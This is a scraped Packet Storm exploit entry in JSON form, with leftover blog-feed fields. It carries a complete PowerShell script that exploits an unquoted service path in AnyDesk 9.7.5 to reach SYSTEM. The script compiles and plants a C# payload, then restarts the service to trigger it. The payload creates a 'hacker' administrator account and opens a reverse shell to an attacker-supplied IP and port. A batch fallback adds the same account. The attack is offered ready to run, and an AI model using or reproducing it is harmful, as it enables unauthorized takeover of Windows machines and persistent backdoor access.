{“lastseen”:”2026-06-16T16:01:24″,”description”:”AnyDesk version 9.7.5 unquoted service path privilege escalation to SYSTEM exploit…”,”published”:”2026-06-16T00:00:00″,”modified”:”2026-06-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 AnyDesk 9.7.5 Unquoted Service Path”,”source”:””,”references”:””,”id”:”PACKETSTORM:223513″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : AnyDesk v9.7.5 Unquoted Service Path Privilege Escalation to SYSTEM |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 151.0.3 (64 bits) |\\n | # Vendor : https:\/\/anydesk.com\/en |\\n ==================================================================================================================================\\n \\n [+] Summary : This script exploits the unquoted service path vulnerability in AnyDesk to escalate privileges to SYSTEM.\\n \\n [+] POC : \\n \\n \\u003c#\\n .SYNOPSIS\\n .EXAMPLE\\n .\\\\AnyDesk_LPE_fixed.ps1\\n .\\\\AnyDesk_LPE_fixed.ps1 -AttackerIP 10.0.0.5 -AttackerPort 4444\\n .\\\\AnyDesk_LPE_fixed.ps1 -Cleanup\\n #\\u003e\\n \\n param(\\n [string]$AttackerIP = \\”127.0.0.1\\”,\\n [int]$AttackerPort = 4444,\\n [string]$PayloadPath = \\”\\”,\\n [switch]$Cleanup,\\n [switch]$RestoreService,\\n [switch]$Verbose\\n )\\n \\n function Write-ColorOutput {\\n param(\\n [string]$Message,\\n [string]$Color = \\”White\\”\\n )\\n $colors = @{\\n \\”SUCCESS\\” = \\”Green\\”\\n \\”ERROR\\” = \\”Red\\”\\n \\”WARNING\\” = \\”Yellow\\”\\n \\”INFO\\” = \\”Cyan\\”\\n \\”DEBUG\\” = \\”DarkGray\\”\\n }\\n $colorName = if ($colors.ContainsKey($Color)) { $colors[$Color] } else { $Color }\\n Write-Host \\”[$(Get-Date -Format ‘HH:mm:ss’)] $Message\\” -ForegroundColor $colorName\\n }\\n \\n function Test-WriteAccess {\\n param([string]$DirectoryPath)\\n \\n try {\\n if (-not (Test-Path $DirectoryPath)) {\\n return $false\\n }\\n \\n $testFile = Join-Path $DirectoryPath \\”.write_test_$(Get-Random).tmp\\”\\n [System.IO.File]::WriteAllText($testFile, \\”test\\”)\\n Remove-Item $testFile -Force -ErrorAction SilentlyContinue\\n return $true\\n } catch {\\n return $false\\n }\\n }\\n \\n function Test-PathWritable {\\n param([string]$FilePath)\\n \\n $directory = [System.IO.Path]::GetDirectoryName($FilePath)\\n \\n if (-not (Test-Path $directory)) {\\n return $false\\n }\\n \\n if (Test-WriteAccess $directory) {\\n return $true\\n }\\n \\n try {\\n $acl = Get-Acl $directory -ErrorAction SilentlyContinue\\n $currentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent().User\\n \\n foreach ($access in $acl.Access) {\\n if ($access.IdentityReference.Value -eq $currentUser.Value -or \\n $access.IdentityReference.Value -eq \\”BUILTIN\\\\Users\\”) {\\n \\n if (($access.FileSystemRights -band [System.Security.AccessControl.FileSystemRights]::Write) -and\\n $access.AccessControlType -eq \\”Allow\\”) {\\n return $true\\n }\\n }\\n }\\n } catch { }\\n \\n return $false\\n }\\n \\n function Test-SystemPrivileges {\\n $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()\\n \\n if ($identity.User.Value -eq \\”S-1-5-18\\”) {\\n return $true\\n }\\n \\n $principal = New-Object System.Security.Principal.WindowsPrincipal($identity)\\n return $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)\\n }\\n \\n function Find-AnyDeskService {\\n $services = Get-CimInstance -ClassName Win32_Service\\n \\n $possibleNames = @(\\”anydesk\\”, \\”AnyDeskService\\”, \\”AnyDesk\\”, \\”AD Service\\”)\\n \\n foreach ($name in $possibleNames) {\\n $service = $services | Where-Object { \\n $_.Name -like \\”*$name*\\” -or \\n $_.DisplayName -like \\”*AnyDesk*\\” -or\\n $_.PathName -like \\”*AnyDesk*\\”\\n }\\n \\n if ($service) {\\n \\n $binPath = $service.PathName -replace ‘^\\”|\\”$’, ”\\n $executable = ($binPath -split ‘ ‘)[0]\\n \\n if (Test-Path $executable) {\\n $versionInfo = Get-ItemProperty -Path $executable -ErrorAction SilentlyContinue\\n if ($versionInfo) {\\n $version = $versionInfo.VersionInfo.ProductVersion\\n Write-ColorOutput \\”Found AnyDesk version: $version\\” \\”INFO\\”\\n }\\n }\\n \\n return $service\\n }\\n }\\n \\n return $null\\n }\\n \\n function Test-UnquotedServicePath {\\n param([object]$Service)\\n \\n if ($Service -eq $null) { return $false }\\n \\n $binPath = $Service.PathName\\n Write-ColorOutput \\”Binary path: $binPath\\” \\”DEBUG\\”\\n \\n $exePath = if ($binPath -match ‘^\\”([^\\”]*)\\”‘) {\\n $matches[1]\\n } else {\\n ($binPath -split ‘ ‘)[0]\\n }\\n \\n Write-ColorOutput \\”Executable path: $exePath\\” \\”DEBUG\\”\\n \\n if (-not (Test-Path $exePath -PathType Leaf)) {\\n Write-ColorOutput \\”Executable not found\\” \\”WARNING\\”\\n return $false\\n }\\n \\n $isUnquoted = ($exePath -match \\” \\” -and $binPath -notmatch ‘^\\”.*\\”$’)\\n \\n if (-not $isUnquoted) {\\n return $false\\n }\\n \\n $directory = [System.IO.Path]::GetDirectoryName($exePath)\\n \\n if (Test-WriteAccess $directory) {\\n Write-ColorOutput \\”Write access confirmed to $directory\\” \\”SUCCESS\\”\\n return $true\\n }\\n \\n Write-ColorOutput \\”No write access to $directory\\” \\”WARNING\\”\\n return $false\\n }\\n \\n function Get-VulnerablePaths {\\n param([object]$Service)\\n \\n $vulnerablePaths = @()\\n \\n if ($Service -eq $null) { return $vulnerablePaths }\\n \\n $binPath = $Service.PathName -replace ‘^\\”|\\”$’, ”\\n $exePath = ($binPath -split ‘ ‘)[0]\\n \\n if ($exePath -notmatch \\” \\”) { return $vulnerablePaths }\\n \\n $current = $exePath\\n \\n while ($current) {\\n $parent = [System.IO.Path]::GetDirectoryName($current)\\n $filename = [System.IO.Path]::GetFileName($current)\\n \\n if ([string]::IsNullOrEmpty($filename) -or $filename -eq $current) { break }\\n \\n if ($filename -match \\” \\” -and (Test-Path $parent -PathType Container)) {\\n \\n $execName = ($filename -split ‘ ‘)[0]\\n $vulnPath = Join-Path $parent \\”$execName.exe\\”\\n \\n if (Test-PathWritable $vulnPath) {\\n Write-ColorOutput \\”Found vulnerable path: $vulnPath\\” \\”INFO\\”\\n $vulnerablePaths += $vulnPath\\n }\\n }\\n \\n $current = $parent\\n }\\n \\n return $vulnerablePaths\\n }\\n \\n function New-MaliciousExecutable {\\n param(\\n [string]$Path,\\n [string]$AttackerIP,\\n [int]$AttackerPort,\\n [string]$CustomPayloadPath\\n )\\n \\n \\n if ($CustomPayloadPath -and (Test-Path $CustomPayloadPath)) {\\n try {\\n Copy-Item -Path $CustomPayloadPath -Destination $Path -Force -ErrorAction Stop\\n Write-ColorOutput \\”Custom payload copied to $Path\\” \\”SUCCESS\\”\\n return $true\\n } catch {\\n Write-ColorOutput \\”Failed to copy custom payload: $($_.Exception.Message)\\” \\”ERROR\\”\\n # Fall through to create our own\\n }\\n }\\n \\n Write-ColorOutput \\”Creating malicious executable: $Path\\” \\”INFO\\”\\n \\n $csharpCode = @\\”\\n using System;\\n using System.Diagnostics;\\n using System.Net.Sockets;\\n using System.Text;\\n \\n class Program {\\n static void Main() {\\n try {\\n \\n ProcessStartInfo psi = new ProcessStartInfo {\\n FileName = \\”cmd.exe\\”,\\n Arguments = \\”\/c net user hacker P@ssw0rd123! \/add \\u0026\\u0026 net localgroup administrators hacker \/add\\”,\\n UseShellExecute = false,\\n RedirectStandardOutput = true,\\n CreateNoWindow = true\\n };\\n \\n Process p = Process.Start(psi);\\n p.WaitForExit();\\n \\n TcpClient client = new TcpClient(\\”$AttackerIP\\”, $AttackerPort);\\n NetworkStream stream = client.GetStream();\\n \\n byte[] buffer = new byte[4096];\\n while (true) {\\n int bytesRead = stream.Read(buffer, 0, buffer.Length);\\n if (bytesRead == 0) break;\\n \\n string command = Encoding.ASCII.GetString(buffer, 0, bytesRead);\\n ProcessStartInfo psi2 = new ProcessStartInfo {\\n FileName = \\”cmd.exe\\”,\\n Arguments = \\”\/c \\” + command,\\n UseShellExecute = false,\\n RedirectStandardOutput = true,\\n CreateNoWindow = true\\n };\\n \\n Process p2 = Process.Start(psi2);\\n string output = p2.StandardOutput.ReadToEnd();\\n p2.WaitForExit();\\n \\n stream.Write(Encoding.ASCII.GetBytes(output), 0, output.Length);\\n }\\n } catch { }\\n }\\n }\\n \\”@\\n \\n # Find C# compiler\\n $cscPaths = @(\\n \\”C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\\”,\\n \\”C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\csc.exe\\”\\n )\\n \\n $cscPath = $null\\n foreach ($path in $cscPaths) {\\n if (Test-Path $path) {\\n $cscPath = $path\\n break\\n }\\n }\\n \\n if (-not $cscPath) {\\n Write-ColorOutput \\”C# compiler not found. Creating simple batch file instead.\\” \\”WARNING\\”\\n $batchContent = \\”@echo off`r`nwhoami \\u003e C:\\\\temp\\\\anydesk_lpe.txt`r`nnet user hacker P@ssw0rd123! \/add`r`nnet localgroup administrators hacker \/add\\”\\n [System.IO.File]::WriteAllText($Path, $batchContent)\\n return (Test-Path $Path)\\n }\\n \\n $tempCS = [System.IO.Path]::GetTempFileName() + \\”.cs\\”\\n [System.IO.File]::WriteAllText($tempCS, $csharpCode)\\n \\n \\u0026 $cscPath \/out:\\”$Path\\” \/target:exe $tempCS 2\\u003e$null\\n \\n Remove-Item $tempCS -Force -ErrorAction SilentlyContinue\\n \\n return (Test-Path $Path)\\n }\\n \\n function Stop-ServiceSafely {\\n param([string]$Name)\\n \\n Write-ColorOutput \\”Stopping $Name service…\\” \\”INFO\\”\\n \\n try {\\n $service = Get-Service -Name $Name -ErrorAction SilentlyContinue\\n if ($service -eq $null) { return $false }\\n \\n # Check dependencies\\n $dependencies = Get-Service -Name $Name -DependentServices -ErrorAction SilentlyContinue\\n if ($dependencies.Count -gt 0) {\\n Write-ColorOutput \\”Service has $($dependencies.Count) dependencies\\” \\”DEBUG\\”\\n }\\n \\n for ($i = 0; $i -lt 5; $i++) {\\n Stop-Service -Name $Name -Force -ErrorAction SilentlyContinue\\n Start-Sleep -Milliseconds 500\\n \\n $svc = Get-Service -Name $Name -ErrorAction SilentlyContinue\\n if ($svc -and $svc.Status -eq \\”Stopped\\”) {\\n Write-ColorOutput \\”Service stopped\\” \\”SUCCESS\\”\\n return $true\\n }\\n }\\n \\n return $false\\n } catch {\\n Write-ColorOutput \\”Failed to stop service: $($_.Exception.Message)\\” \\”ERROR\\”\\n return $false\\n }\\n }\\n \\n function Start-ServiceSafely {\\n param([string]$Name)\\n \\n Write-ColorOutput \\”Starting $Name service…\\” \\”INFO\\”\\n \\n try {\\n for ($i = 0; $i -lt 3; $i++) {\\n Start-Service -Name $Name -ErrorAction SilentlyContinue\\n Start-Sleep -Seconds 2\\n \\n $svc = Get-Service -Name $Name -ErrorAction SilentlyContinue\\n if ($svc -and $svc.Status -eq \\”Running\\”) {\\n Write-ColorOutput \\”Service started\\” \\”SUCCESS\\”\\n return $true\\n }\\n }\\n \\n return $false\\n } catch {\\n Write-ColorOutput \\”Failed to start service: $($_.Exception.Message)\\” \\”ERROR\\”\\n return $false\\n }\\n }\\n \\n function Remove-FileWithRetry {\\n param([string]$Path)\\n \\n if (-not (Test-Path $Path)) { return $true }\\n \\n for ($i = 0; $i -lt 5; $i++) {\\n try {\\n Remove-Item -Path $Path -Force -ErrorAction Stop\\n return $true\\n } catch {\\n if ($i -lt 4) {\\n Start-Sleep -Seconds 1\\n }\\n }\\n }\\n \\n Write-ColorOutput \\”Could not delete $Path (may be in use)\\” \\”WARNING\\”\\n return $false\\n }\\n \\n function Invoke-AnyDeskLPE {\\n Write-ColorOutput @\\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 AnyDesk v9.7.5 – Unquoted Service Path Privilege Escalation \u2551\\n \u2551 Local Privilege Escalation to SYSTEM \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\”@ \\”INFO\\”\\n \\n Write-ColorOutput \\”Target: $env:COMPUTERNAME\\” \\”INFO\\”\\n Write-ColorOutput \\”User: $env:USERNAME\\” \\”INFO\\”\\n \\n if (Test-SystemPrivileges) {\\n Write-ColorOutput \\”Already running as SYSTEM!\\” \\”SUCCESS\\”\\n return $true\\n }\\n \\n $service = Find-AnyDeskService\\n if ($service -eq $null) {\\n Write-ColorOutput \\”AnyDesk service not found\\” \\”ERROR\\”\\n return $false\\n }\\n \\n Write-ColorOutput \\”Service found: $($service.Name)\\” \\”SUCCESS\\”\\n \\n if (-not (Test-UnquotedServicePath -Service $service)) {\\n Write-ColorOutput \\”Service is not vulnerable (path is quoted or no write access)\\” \\”ERROR\\”\\n return $false\\n }\\n \\n $vulnerablePaths = Get-VulnerablePaths -Service $service\\n \\n if ($vulnerablePaths.Count -eq 0) {\\n Write-ColorOutput \\”No vulnerable paths found\\” \\”ERROR\\”\\n return $false\\n }\\n \\n Write-ColorOutput \\”Found vulnerable paths:\\” \\”SUCCESS\\”\\n foreach ($path in $vulnerablePaths) {\\n Write-ColorOutput \\” $path\\” \\”INFO\\”\\n }\\n \\n $targetPath = $vulnerablePaths[0]\\n \\n if (-not (New-MaliciousExecutable -Path $targetPath -AttackerIP $AttackerIP -AttackerPort $AttackerPort -CustomPayloadPath $PayloadPath)) {\\n Write-ColorOutput \\”Failed to create malicious executable\\” \\”ERROR\\”\\n return $false\\n }\\n \\n Write-ColorOutput \\”Malicious executable created at: $targetPath\\” \\”SUCCESS\\”\\n \\n if (Stop-ServiceSafely -Name $service.Name) {\\n Write-ColorOutput \\”Payload trigger initiated\\” \\”SUCCESS\\”\\n \\n Start-Sleep -Seconds 5\\n \\n if ($RestoreService) {\\n Start-ServiceSafely -Name $service.Name\\n }\\n } else {\\n Write-ColorOutput \\”Could not stop service. Manual trigger may be needed.\\” \\”WARNING\\”\\n }\\n \\n Write-ColorOutput \\”Exploit completed\\” \\”SUCCESS\\”\\n return $true\\n }\\n \\n function Invoke-Cleanup {\\n Write-ColorOutput \\”Cleaning up…\\” \\”INFO\\”\\n $pathsToClean = @(\\n \\”C:\\\\Program.exe\\”,\\n \\”C:\\\\Program Files.exe\\”,\\n \\”C:\\\\Program Files (x86)\\\\AnyDesk\\\\Program.exe\\”\\n )\\n foreach ($path in $pathsToClean) {\\n if (Test-Path $path) {\\n Remove-FileWithRetry -Path $path\\n }\\n }\\n Write-ColorOutput \\”Cleanup completed\\” \\”SUCCESS\\”\\n }\\n $result = Invoke-AnyDeskLPE\\n \\n if ($Cleanup) {\\n Invoke-Cleanup\\n }\\n exit (-not $result)\\n \\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/223513″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/223513\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-16T16:01:24″,”description”:”AnyDesk version 9.7.5 unquoted service path privilege escalation to SYSTEM exploit…”,”published”:”2026-06-16T00:00:00″,”modified”:”2026-06-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 AnyDesk 9.7.5 Unquoted Service Path”,”source”:””,”references”:””,”id”:”PACKETSTORM:223513″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : AnyDesk v9.7.5 Unquoted Service Path…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-63181","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n